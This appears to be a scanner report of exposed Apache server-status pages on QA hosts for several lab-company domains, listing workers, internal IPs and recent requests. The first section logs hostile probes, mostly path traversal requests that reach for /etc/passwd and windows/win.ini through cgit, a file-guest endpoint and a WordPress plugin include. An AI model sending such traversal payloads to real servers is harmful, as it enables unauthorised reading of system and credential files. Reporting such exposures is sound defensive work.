16-074060/17/3706R 0.033851211051710.00.0576.62 10.253.106.168http/1.1 17-0260540/76/3703R 0.17376012471700.00.2152.46 10.253.106.191http/1.1 18-070780/7/3513R 0.00376108986730.00.0150.53 10.253.106.168http/1.1 19-094770/53/4007_ 0.12711010938420.00.17255.82 10.253.106.191http/1.1 20-0261055/59/3489K 0.1226212129610010.60.2353.62 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 21-0261060/31/4088_ 0.0613118433600.00.05139.38 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwind 22-0261070/15/3584R 0.0338029711300320.00.13221.48 10.253.106.168http/1.1 23-071463/35/3176K 0.056277332824.00.3662.59 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /login HTTP/1.1 24-074071/10/3427K 0.01221110836241.50.01215.65 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /bugs/verify.php?confirm_hash&id=1 HTTP/1.1 25-074110/36/3768_ 0.07611310499200.00.7074.77 10.253.106.168http/1.1 26-0289940/84/3208R 0.19295107750730.00.2169.88 10.253.106.168http/1.1 27-099670/64/3306R 0.1525913011516310.00.19122.30 10.253.106.191http/1.1 28-0194100/37/3481R 0.13831110227380.00.3792.67 10.253.106.191http/1.1 29-074130/5/3609_ 0.0121129528830.00.01107.95 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 30-0112170/113/3298_ 0.2710116684430.00.66133.57 10.253.106.191http/1.1 31-086690/3/3165_ 0.00321111181640.00.00112.05 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1 32-076200/21/3332_ 0.03301210386720.00.04220.81 10.253.106.191http/1.1qa1-corporate.thermofisher.com:GET /filemanager/ajax_calls.php?action=get_file&sub_action=prev 33-0225435/54/3428K 0.1615393796056213.30.8549.29 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/clientlib-base.min.css H 34-076210/19/3359_ 0.0810119410790.00.1885.47 10.253.106.168http/1.1 35-0152712/74/3346K 0.2015378913649.30.5949.57 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/components/allergen_fact_sheet/clie 36-099700/134/3505_ 0.451007960040.00.99211.11 10.253.106.191http/1.1 37-076220/4/3690R 0.0036658727300.00.01120.08 10.253.106.168http/1.1 38-086700/0/3011R 0.0015106610180.00.00199.74 10.253.106.168http/1.1 39-086710/1/3413_ 0.0041811773150.00.00194.72 10.253.106.191http/1.1qa1-corporate.thermofisher.com:POST /api/external/7.0/system.System.get_infos HTTP/1.1 40-0164570/105/2933R 0.26278136249390.00.44240.72 10.253.106.191http/1.1 41-086720/4/3665_ 0.0034137334670.00.01107.56 10.253.106.191http/1.1qa1-corporate.thermofisher.com:GET /../../etc/passwd HTTP/1.1 42-086730/2/3428_ 0.003349671340.00.00155.77 10.253.106.191http/1.1qa1-corporate.thermofisher.com:GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/p 43-086740/1/3191_ 0.003207662250.00.0060.45 10.253.106.191http/1.1qa1-corporate.thermofisher.com:GET /webui/file_guest?path=/var/www/documentation/../../../../. 44-0191210/252/3105_ 0.8127117335270.06.1880.19 10.253.106.191http/1.1qa1-corporate.thermofisher.com:GET /wp-content/plugins/localize-my-post/ajax/include.php?file= 45-0274662/170/3257K 0.572013997392.11.19267.45 10.253.106.168http/1.1qa1.unitylabservices.com:80GET / HTTP/1.1 46-086751/1/3199K 0.0032111673271.40.00146.21 10.253.106.168http/1.1qa1-corporate.thermofisher.com:GET /index.php/System/MailConnect/host/cpva750pbs8skkl6cdi0pnh7 47-0-0/0/3074. 0.003903013993180.00.0061.52 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 48-0-0/0/3206. 0.00256605963420.00.00157.45 127.0.0.1http/1.1</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c3c4190b3
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Wednesday, 26-Jun-2024 08:25:38 EDT Restart Time: Friday, 21-Jun-2024 10:03:23 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 4 days 22 hours 22 minutes 14 seconds Server load: 0.02 0.07 0.04 Total accesses: 320731 - Total Traffic: 5.7 GB - Total Duration: 106858913 CPU Usage: u31.7 s85.98 cu538.99 cs317.17 - .229% CPU load .753 requests/sec - 14.1 kB/second - 18.8 kB/request - 333.173 ms/request 34 requests currently being processed, 40 idle workers R_KKKK___KKRKK_RK__K_R___K_.____WK_K_KRKKK_KKR____K_R.RRR_._R_R_ _._..____K______................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0246980/0/3186R 0.00412011079170.00.00183.85 10.253.106.191http/1.1 1-0212280/0/3163_ 0.005106776050.00.0047.54 10.253.106.168http/1.1 2-0246994/4/2893K 0.0515081443312111.90.1177.31 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/vendor/dataTablesRespons 3-02243542614/42614/42614K 39.95303948378012.176.1876.18 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-0207186/11/2785K 0.051776190598122.90.0875.92 10.253.106.168http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/tabletlibs.min.2020.1.0.c 5-02243742614/42614/42614K 40.57013885078019.476.1976.19 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 6-0219420/2/2953_ 0.0150127552810.00.0276.70 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/bootstrap.min.js HTTP/1.1 7-0221200/4/3133_ 0.013511213866610.00.0279.25 10.253.106.168http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 8-0175150/1/3039_ 0.001088168322390.00.0174.64 10.253.106.191http/1.1 9-0186331/22/2689K 0.111767579565611.50.6832.72 10.253.106.191http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/mobilelibs.min.2020.1.0.c 10-0212297/7/2833K 0.0123701115666268.60.2670.39 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-magni 11-0212300/12/2356R 0.03430136197850.00.1436.94 10.253.106.168http/1.1 12-0212313/12/2846K 0.026601238727260.70.9646.01 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/clientlib-site.min.css H 13-02249627/27/3288K 0.2166012389931458.91.4254.46 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/vendor/slick_carousel.mi 14-0227210/5/3018_ 0.0022109920950.00.0267.17 10.253.106.191http/1.1 15-0219430/9/3076R 0.01492110454380.00.1543.51 10.253.106.168http/1.1 16-0225071/1/3027K 0.001777310319485.20.0158.41 10.253.106.191http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/desktoplibs.min.2020.1.0. 17-016110/4/2834_ 0.00501110196210.00.0344.44 10.253.106.191http/1.1 18-0214480/16/2687_ 0.0410787536460.00.1840.06 10.253.106.191http/1.1 19-016131/17/3192K 0.031775510087251.60.14235.12 10.253.106.168http/1.1qa1.thermofisher.in:80GET /chemicals/en/home.globalconfig.js HTTP/1.1 20-0214510/1/2715_ 0.0012519696500.00.0039.59 10.253.106.191http/1.1 21-0247000/0/3325R 0.0041107698760.00.00109.47 10.253.106.191http/1.1 22-0204640/22/3026_ 0.3051210715900.00.71165.97 10.253.106.168http/1.1 23-0227220/16/2639_ 0.0650156962970.00.3757.02 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 24-0186340/4/2671_ 0.011074178764290.00.01203.38 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/font-awesome.min.css HTTP/1 25-0249685/5/2906K 0.0066089039414.20.0145.65 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-image 26-0219440/1/2539_ 0.0650826500560.00.1056.39 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/clientlib-all.min.js HTTP/1.1 27-0-0/0/2784. 0.00106010955960.00.0068.26 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 28-0215540/2/2811_ 0.0010715139316420.00.0053.71 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 29-0325060/14/2760_ 0.2010713908734270.00.5792.15 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 30-0175170/14/2728_ 0.0450126153600.00.1789.93 10.253.106.168http/1.1 31-0215550/7/2658_ 0.0550158837730.00.15103.62 10.253.106.168http/1.1 32-02497012/12/2632W 0.0500695844110.80.1159.29 10.253.106.191http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 33-0325095/10/2805K 0.1123741676433155.80.1738.79 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/clientlib-all.min.css HTTP/1.1 34-0186360/2/2563_ 0.011075458564390.00.0457.12 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/bootstrap.min.css HTTP/1.1 35-0215562/3/2724K 0.0515057823493124.50.1340.94 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/vendor/jquery.min.js HTT 36-0227240/0/2826_ 0.0032107161820.00.0088.20 10.253.106.168http/1.1 37-02194514/18/2898K 0.10522257529130409.60.55111.95 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /content/allergy/wo/ko/living-with-allergies/testing-and-di 38-0227250/0/2438R 0.0036805442140.00.00185.64 10.253.106.191http/1.1 39-0219465/7/2617K 0.0317753110461337.80.1039.47 10.253.106.191http/1.1qa1.thermofisher.in:80GET /chemicals/en/home.globalconfig.js HTTP/1.1 40-0249764/4/2210K 0.0314453274293.00.0938.04 10.253.106.191http/1.1qa1.unitylabservices.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 41-0249771/1/2947K 0.0066567134513.00.0198.41 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/vendor/slick_carousel.mi 42-023540/35/2886_ 0.0710710608541860.03.48106.74 10.253.106.191http/1.1 43-02046719/24/2417K 0.07121260676077405.40.4245.98 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /content/dam/allergy/en/documents/clinical-resources/gb/euf 44-01786516/16/2466K 0.326652663551707.50.6965.65 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/clientlib-base.min.css H 45-0249780/0/2637R 0.00352012811000.00.0038.23 10.253.106.191http/1.1 46-0219480/8/2701_ 0.01108010991130.00.03121.02 10.253.106.191http/1.1 47-041720/6/2444_ 0.01511110650240.00.0344.70 10.253.106.168http/1.1 48-0289070/19/2554_ 0.115025311300.00.34149.91 10.253.106.168http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c0d428647
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Monday, 24-Jun-2024 11:21:51 EDT Restart Time: Friday, 21-Jun-2024 10:03:23 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 3 days 1 hour 18 minutes 28 seconds Server load: 0.00 0.00 0.00 Total accesses: 134427 - Total Traffic: 3.0 GB - Total Duration: 14523127 CPU Usage: u29.87 s61.14 cu187.39 cs118.8 - .151% CPU load .509 requests/sec - 12.0 kB/second - 23.5 kB/request - 108.037 ms/request 32 requests currently being processed, 31 idle workers _RKKRKR__.__K_R_.R_RRRKR__R.___.KKK__.RRR._._KRR._K.___.._....KK .RR_.W.___.R._.__._...._...R.................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-042720/193/1288_ 0.4956101941990.01.44156.96 10.253.106.191http/1.1 1-083250/129/1116R 0.28534121495550.00.3316.51 10.253.106.168http/1.1 2-042755/88/966K 0.231171147905321.10.3353.69 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 3-02243526391/26391/26391K 24.69702430248230.347.1047.10 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-064710/72/941R 0.25235131325550.00.5724.01 10.253.106.191http/1.1 5-02243726391/26391/26391K 25.21402370748234.847.1047.10 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 6-064720/218/1189R 0.7252351254690.02.0948.91 10.253.106.168http/1.1 7-0298880/0/1124_ 0.0021801526400.00.0024.99 10.253.106.191http/1.1 8-076890/183/900_ 0.481302833820.01.1724.92 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /content/diagnostics/phadia/international/ko-wo/software-an 9-0-0/0/1054. 0.003301248470.00.0014.67 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 10-075410/109/1114_ 0.235603013630.00.2813.47 10.253.106.191http/1.1 11-070680/41/914_ 0.35203113137350.00.7821.11 10.253.106.168http/1.1 12-043195/143/1162K 0.531331232180827.51.3221.57 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 13-0275440/3/1406_ 0.0122992434450.00.0526.03 10.253.106.168http/1.1 14-064740/146/1160R 0.55434122938480.01.4147.61 10.253.106.191http/1.1 15-076900/237/1073_ 0.5522912940780.00.6212.85 10.253.106.168http/1.1 16-0-0/0/1385. 0.005002320230.00.0031.46 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 17-0121900/106/1164R 0.31327113098090.00.8425.18 10.253.106.191http/1.1 18-070690/123/998_ 0.315602130590.00.6114.30 10.253.106.168http/1.1 19-070700/77/1245R 0.2252102017880.00.50205.56 10.253.106.191http/1.1 20-065200/65/913R 0.1736161014930.00.5312.64 10.253.106.168http/1.1 21-0117900/258/1327R 0.63361643133470.012.2549.84 10.253.106.191http/1.1 22-0652116/145/1347K 0.672441215590944.91.46140.66 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 23-089450/138/963R 0.4934631158200.01.2117.05 10.253.106.191http/1.1 24-083270/90/1156_ 0.23129121616020.00.34177.39 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 25-065250/172/1070_ 0.469102719680.00.8022.62 10.253.106.191http/1.1 26-0325620/85/912R 0.2236172230990.01.8434.91 10.253.106.191http/1.1 27-0-0/0/1120. 0.005203173560.00.0018.14 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 28-083280/214/1140_ 0.9056141024960.01.3413.64 10.253.106.168http/1.1 29-077050/56/1009_ 0.12560973510.00.1248.88 10.253.106.191http/1.1 30-077060/84/1034_ 0.2258121276460.00.5524.01 10.253.106.191http/1.1www.qa.thermofisher.com:80GET /content/dam/phadia/adlm/images/abstract-gray-to-white-bg.j 31-0-0/0/1089. 0.005303499720.00.0083.52 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 32-0124773/131/1183K 0.6354322744923.62.0823.37 10.253.106.191http/1.1qa1.unitylabservices.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 33-077169/112/1225K 0.242861216374240.80.4420.42 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 34-0107152/86/978K 0.26149133577154.60.4727.42 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 35-0124800/243/1138_ 0.58203471105390.01.7721.70 10.253.106.168http/1.1qa1.thermofisher.in:80GET /Akamai/sureroute-test-object.html HTTP/1.1 36-0300320/0/1128_ 0.0010301615600.00.0067.51 10.253.106.191http/1.1 37-0-0/0/1166. 0.0052101539230.00.0034.45 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 38-048010/97/976R 0.294317963370.01.00160.63 10.253.106.168http/1.1 39-0121910/37/892R 0.1053481339290.00.1716.56 10.253.106.168http/1.1 40-0121920/88/833R 0.22315141827470.01.4121.37 10.253.106.191http/1.1 41-0-0/0/1179. 0.005101036770.00.0030.01 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 42-0109750/148/1274_ 0.3812602680250.01.7674.19 10.253.106.168http/1.1 43-0-0/0/980. 0.0053201898200.00.0027.48 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 44-0275450/7/761_ 0.0112601105330.00.0614.36 10.253.106.191http/1.1 45-0275463/120/985K 0.43117123300337.13.8716.70 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 46-083770/96/1098R 0.29523121159800.00.4765.17 10.253.106.168http/1.1 47-083780/41/986R 0.1025611104680.00.4714.16 10.253.106.191http/1.1 48-0-0/0/886. 0.002170806560.00.00119.34 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 49-083790/49/761_ 0.13203561495350.00.267.78 10.253.106.168http/1.1qa1.thermofisher.in:80GET /Akamai/sureroute-test-object.html HTTP/1.1 50-096292/145/988K 0.62117112279114.72.7221.34 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 51-0-0/0/1034. 0.005001845350.00.0018.34 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 52-0300340/0/896_ 0.0010303104970.00.0016.51 10.253.106.191http
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127cc518c18b
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Saturday, 22-Jun-2024 12:56:46 EDT Restart Time: Friday, 21-Jun-2024 10:03:23 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 1 day 2 hours 53 minutes 23 seconds Server load: 0.03 0.03 0.00 Total accesses: 36403 - Total Traffic: 1.5 GB - Total Duration: 5747032 CPU Usage: u9.74 s20.09 cu60.25 cs31.08 - .125% CPU load .376 requests/sec - 16.4 kB/second - 43.7 kB/request - 157.872 ms/request 44 requests currently being processed, 40 idle workers _RRKKKR___R_RRRR_.___.__R__.____R__RW._R_RR__R____R____R____K.K. R___K._....._.....K..RRR.R.KRRKKRRRRRRRRR....................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0208050/17/321_ 0.1415412597230.00.6866.49 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 1-0209010/0/318R 0.002540472780.00.009.85 10.253.106.191http/1.1 2-0248360/0/195R 0.0025201765460.00.007.01 10.253.106.168http/1.1 3-0224359681/9681/9681K 8.7920852317616.917.2017.20 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-0204742/7/182K 0.0658654455100.80.6313.96 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/vendor/slick_carousel.mi 5-0224379680/9680/9680K 9.0990828517616.717.2017.20 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 6-0248370/0/273R 0.002510433440.00.0035.59 10.253.106.168http/1.1 7-0204750/26/191_ 0.104777329710.00.677.67 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/clientlibs/granite/jqu 8-0158280/19/168_ 0.11477301530.00.2115.66 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 9-0231770/21/215_ 0.09478330330.00.565.64 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/multisitecommons/clien 10-0237650/3/208R 0.00252121991810.00.016.28 10.253.106.168http/1.1 11-0327090/11/191_ 0.024791639610.00.049.09 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 12-0194230/61/315R 0.272851542016670.04.3612.08 10.253.106.191http/1.1 13-0167450/19/459R 0.12254161247240.00.6415.48 10.253.106.191http/1.1 14-0248380/0/303R 0.0025101784790.00.0034.47 10.253.106.168http/1.1 15-0237660/1/202R 0.0025210298740.00.006.84 10.253.106.168http/1.1 16-0174380/22/290_ 0.04477546830.00.2720.56 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc/designs/diagnostics/vendor/bootst 17-0-0/0/250. 0.0025302079500.00.009.14 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 18-0251180/1/239_ 0.00478409980.00.006.91 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc/designs/diagnostics/vendor/lazylo 19-0175630/17/353_ 0.03477919580.00.56159.35 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 20-0251230/0/276_ 0.00470340640.00.003.72 10.253.106.191http/1.1 21-0-0/0/262. 0.004501905730.00.0027.15 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 22-0243890/0/316_ 0.001900703720.00.0096.28 10.253.106.191http/1.1 23-0251240/1/268_ 0.00478543570.00.009.50 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 24-0209040/7/312R 0.1528510681620.00.81165.82 10.253.106.191http/1.1 25-0251250/1/248_ 0.0047111826060.00.009.24 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/clientlibs/granite/jqu 26-0177990/9/130_ 0.034791534930.00.283.82 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 27-0-0/0/183. 0.0025102470490.00.009.69 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 28-0243910/1/179_ 0.004712288970.00.015.52 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/clientlibs/granite/jqu 29-0178020/6/218_ 0.034713414720.00.046.23 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc/designs/diagnostics/vendor/font-a 30-0243920/5/213_ 0.00476294390.00.0213.62 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 31-0178030/9/197_ 0.024761535810.00.2767.40 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/multisitecommons/clien 32-0248400/0/216R 0.002510800820.00.005.50 10.253.106.168http/1.1 33-0209050/16/377_ 0.044714428990.00.198.00 10.253.106.191http/1.1 34-0156110/11/219_ 0.10461236260.01.1317.01 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /onelambda/us/en/learning-center/video-210721-dilutions-sol 35-0170130/11/270R 0.142520453130.00.4111.88 10.253.106.168http/1.1 36-01701410/28/206W 0.34002113410.30.664.45 10.253.106.168http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 37-0-0/0/324. 0.002520783490.00.009.86 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 38-0248410/4/288_ 0.0619063445580.00.11146.87 10.253.106.191http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/api/aem-datahub/api/e_catalog/product 39-0183950/5/219R 0.002548314800.00.018.73 10.253.106.191http/1.1 40-0158320/28/207_ 0.11477552790.04.6112.44 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 41-0242110/2/240R 0.0128513259200.00.0220.15 10.253.106.191http/1.1 42-0237740/2/276R 0.0019121651790.00.1415.80 10.253.106.191http/1.1 43-0156140/24/222_ 0.19476641200.01.185.86 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 44-0237750/0/141_ 0.001900174210.00.002.10 10.253.106.191http/1.1 45-0170170/21/204R 0.572541246330.00.995.47 10.253.106.191http/1.1 46-0248420/0/212_ 0.001910191320.00.0023.84 10.253.106.168http/1.1 47-0156170/17/248_ 0.04477439290.00.105.68 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 48-0263210/63/157_ 0.31477360460.01.32112.48 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc/designs/diagnostics/vendor/ofi.mi 49-0251260/1/220_ 0.004761019880.00.003.64 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/multisitecommons/clien 50-0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c7e225093
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Thursday, 20-Jun-2024 18:13:08 EDT Restart Time: Thursday, 13-Jun-2024 12:38:57 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 7 days 5 hours 34 minutes 10 seconds Server load: 0.15 0.08 0.02 Total accesses: 679172 - Total Traffic: 10.5 GB - Total Duration: 73798503 CPU Usage: u60.31 s123.74 cu1155.1 cs747.55 - .334% CPU load 1.09 requests/sec - 17.6 kB/second - 16.2 kB/request - 108.66 ms/request 37 requests currently being processed, 31 idle workers K_R_______R_RK_KK__R_R_K_R_K__.RRWKRR__R.KKK_KR_RK_R.__..._.._.. ..K....._..RKK_R...K_......._..R..K....................K.R...... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0175962486/62486/62486K 58.101053050114730.3112.04112.04 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 1-0243370/113/6645_ 0.55128137336380.02.27127.46 10.253.106.191http/1.1 2-050540/3/7437R 0.013384612262010.00.02113.71 10.253.106.168http/1.1 3-0297260/84/6930_ 0.32256311831170.00.97175.18 10.253.106.168http/1.1qa1.allergyinsider.com:80POST / HTTP/1.1 4-0307980/152/7436_ 0.4326807224730.04.14187.98 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /content/diagnostics/patient/global/en/allergy-types/year-r 5-0285510/56/5771_ 0.14223010224740.00.4592.73 10.253.106.168http/1.1 6-0285520/63/7378_ 0.28218509171700.02.78135.06 10.253.106.191http/1.1 7-0285530/64/6676_ 0.25182128746070.00.55106.11 10.253.106.168http/1.1 8-0301600/156/7096_ 0.5433128655000.00.74148.11 10.253.106.168http/1.1 9-0301640/67/6877_ 0.58105158076940.01.36107.65 10.253.106.191http/1.1 10-0301650/20/7347R 0.065634512244400.00.06146.69 10.253.106.191http/1.1 11-0301660/52/6443_ 0.1410317162970.01.44168.93 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /content/diagnostics/patient/europe/en-it/allergy-symptoms/ 12-0324120/0/6153R 0.0058107871080.00.00189.54 10.253.106.168http/1.1 13-0723012/217/6881K 0.9529920946396663.86.49136.61 10.253.106.191http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/api/aem-datahub/api/e_catalog/product 